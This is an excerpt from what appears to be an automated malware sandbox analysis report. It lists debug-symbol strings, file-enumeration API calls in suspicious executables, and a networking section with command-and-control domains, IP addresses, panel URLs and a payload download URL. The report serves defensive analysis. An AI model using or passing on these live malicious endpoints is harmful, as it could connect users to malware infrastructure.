                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1597912717.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599207028.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600305599.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589825821.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598486784.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1595664997.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599069389.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589063022.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: trano1221.exe, 0000002A.00000002.1975102681.00007FF98B9F1000.00000040.00000001.01000000.00000034.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591679400.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588680873.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589182480.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598930353.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: trano1221.exe, 0000002A.00000002.1996605213.00007FF98C9D1000.00000040.00000001.01000000.00000029.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: trano1221.exe, 0000002A.00000002.2030594224.00007FF9A3331000.00000040.00000001.01000000.00000027.sdmp
                                      Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593203015.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ucrtbase.pdbUGP source: trano1221.exe, 0000002A.00000002.2026351473.00007FF98EA95000.00000002.00000001.01000000.0000001B.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: trano1221.exe, 00000023.00000003.1583404038.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2031587031.00007FF9A75E5000.00000002.00000001.01000000.00000039.sdmp
                                      Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600657542.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589681525.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: trano1221.exe, 0000002A.00000002.1975488711.00007FF98BB50000.00000040.00000001.01000000.00000033.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb}},GCTL source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: trano1221.exe, 0000002A.00000002.1986859487.00007FF98C331000.00000040.00000001.01000000.00000036.sdmp
                                      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1596701757.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591525735.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pywintypes.pdb** source: trano1221.exe, 0000002A.00000002.1973847890.00007FF98B771000.00000040.00000001.01000000.00000038.sdmp
                                      Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1588821073.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598775483.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: trano1221.exe, 00000023.00000003.1583189955.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.2033979566.00007FF9AF531000.00000002.00000001.01000000.0000001D.sdmp
                                      Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: trano1221.exe, 00000023.00000003.1590455368.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599693153.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: trano1221.exe, 00000023.00000003.1592148006.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: trano1221.exe, 0000002A.00000002.2006486368.00007FF98E76B000.00000040.00000001.01000000.0000001C.sdmp
                                      Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1591309503.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599866003.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600849374.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593372329.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1598137593.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1593530214.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: trano1221.exe, 00000023.00000003.1589513980.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: trano1221.exe, 0000002A.00000002.2029904114.00007FF9A06FC000.00000040.00000001.01000000.00000028.sdmp
                                      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600027684.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1590256912.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1589946129.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-311\Release\pythoncom.pdb source: trano1221.exe, 0000002A.00000002.1973364756.00007FF98B6B1000.00000040.00000001.01000000.0000003A.sdmp
                                      Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000002.1941606459.000001E16B3B0000.00000002.00000001.01000000.0000001E.sdmp
                                      Source: Binary string: D:\a\1\b\libssl-3.pdb source: trano1221.exe, 0000002A.00000002.1980030194.00007FF98BD75000.00000040.00000001.01000000.0000002D.sdmp
                                      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1599377266.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: trano1221.exe, 00000023.00000003.1600505618.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: trano1221.exe, 0000002A.00000002.1984942451.00007FF98C2E1000.00000040.00000001.01000000.0000002B.sdmp
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe Code function: 13_2_0097EF71 FindFirstFileExW, 13_2_0097EF71
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Code function: 14_2_0041EF71 FindFirstFileExW, 14_2_0041EF71
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_00407620
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 17_2_00401280
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 17_2_00401090
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_0040A150
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose, 17_2_0040B570
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 17_2_0040B110
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 17_2_0040B3A0
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_006ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 18_2_006ADBBE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_0067C2A2 FindFirstFileExW, 18_2_0067C2A2
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_006B68EE FindFirstFileW,FindClose, 18_2_006B68EE
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_006B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 18_2_006B698F
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_006AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_006AD076
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_006AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 18_2_006AD3A9
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_006B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_006B9642
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Code function: 18_2_006B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 18_2_006B979D
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,18_2_006B9B2B
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeCode function: 18_2_006B5C97 FindFirstFileW,FindNextFileW,FindClose,18_2_006B5C97
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\userJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppDataJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                                      Networking

                                      Source: Malware configuration extractor | URLs: codxefusion.top
                                      Source: Malware configuration extractor | URLs: hardswarehub.today
                                      Source: Malware configuration extractor | URLs: gadgethgfub.icu
                                      Source: Malware configuration extractor | URLs: hardrwarehaven.run
                                      Source: Malware configuration extractor | URLs: techmindzs.live
                                      Source: Malware configuration extractor | URLs: quietswtreams.life
                                      Source: Malware configuration extractor | URLs: techspherxe.top
                                      Source: Malware configuration extractor | URLs: ctrlgem.xyz/gate.php
                                      Source: Malware configuration extractor | IPs: 176.113.115.6
                                      Source: Joe Sandbox View | IP Address: 176.113.115.7
                                      Source: Joe Sandbox View | IP Address: 176.113.115.6
                                      Source: Joe Sandbox View | ASN Name: SELECTELRU
                                      Source: Joe Sandbox View | ASN Name: SELECTELRU
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe | Code function: 13_2_0095C3B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep | 13_2_0095C3B0
                                      Source: trano1221.exe, 0000002A.00000002.1950520854.000001E16C380000.00000004.00001000.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1789766220.000001E16BCF7000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 0000002A.00000003.1779497201.000001E16BCF7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://.../back.jpeg
                                      Source: rapes.exe, 00000006.00000003.5645957689.0000000000B1A000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                                      Source: powershell.exe, 00000019.00000002.1586419592.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1586419592.00000000049C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7
                                      Source: powershell.exe, 0000001D.00000002.4028270818.000001D880001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.7/mine/random.exe
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.209/Di0Her478/index.php
                                      Source: futors.exe, 0000000F.00000003.1632617370.00000000014DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.209/Di0Her478/index.php)
                                      Source: futors.exe, 0000000F.00000003.1632617370.0000000001524000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.209/Di0Her478/index.php101
                                      Source: trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digi
                                      Source: trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digiD
                                      Source: trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.co
                                      Source: trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.coC
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1586024618.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C400000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, 
trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                                      Source: UD49QH6.exe, 00000010.00000003.1447534913.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
                                      Source: m0wsoI3.exe, 00000011.00000002.1518652176.0000000000681000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530953936.000000000FF93000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1518652176.000000000066A000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000011.00000002.1530707992.000000000FE10000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, 
trano1221.exe, 00000023.00000003.1606270626.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585164780.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                      Source: rapes.exe, 00000006.00000003.5646796059.0000000000B58000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 00000006.00000003.5646796059.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584996545.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1609046111.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1587751627.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1583958275.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607369375.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588013358.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1611379233.0000013C2C3F5000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585628813.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588172070.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585492797.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607707168.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1585342620.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1584677472.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1588526671.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1606674528.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1605740646.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, trano1221.exe, 00000023.00000003.1607067585.0000013C2C3F3000.00000004.00000020.00020000.00000000.sdmp, 
